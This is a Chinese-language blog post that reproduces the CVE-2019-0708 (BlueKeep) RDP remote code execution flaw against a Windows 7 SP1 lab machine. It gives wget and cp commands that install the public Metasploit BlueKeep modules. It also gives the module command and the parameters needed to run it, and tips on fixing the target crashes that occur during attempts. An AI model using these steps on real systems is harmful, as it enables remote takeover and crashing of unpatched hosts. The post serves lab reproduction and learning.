CVE-2019-0708 远程桌面代码执行漏洞复现
0x01前言
最近有一段时间没有更新了,这几天也是被0708刷屏了赶紧来更新一下。
0x02漏洞介绍
Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。
0x03影响版本
Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP
0x04靶机
首先是靶机,这里的靶机是使用的是win7sp1的旗舰版系统 下载地址
开启3389
关闭防火墙
0x04模块下载&替换
由于我的msf重新安装过所以目录在/opt下 默认目录是/usr/share/metasploit-framework/
我们需要下载好对应的模块放置文件到msf的相应文件夹(如果已存在同名文件,直接覆盖即可)
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
然后复制到对应路径
cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/
cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/
文件夹不存在时手动创建
cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/rdp/
cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/
0x05复现
更新以后使用reload_all重新加载0708rdp利用模块
使用模块
use exploit/rdp/cve_2019_0708_bluekeep_rce
主要设置的参数有RDP_CLIENT_IP / RHOSTS / target
配置好需要的参数,是否设置payload都无所谓
小火车启动,成功
0x06复现过程中遇到的问题
蓝屏(10次7蓝)
这种情况是 rdp.rb 和 rdp_scanner.rb 文件没覆盖好
确认系统是win7sp1,3389端口开启,能ping的通,且文件覆盖成功,target0-4都试了遍,重启系统多次,要是还是没法成功,把配置设置成2核2g在试试。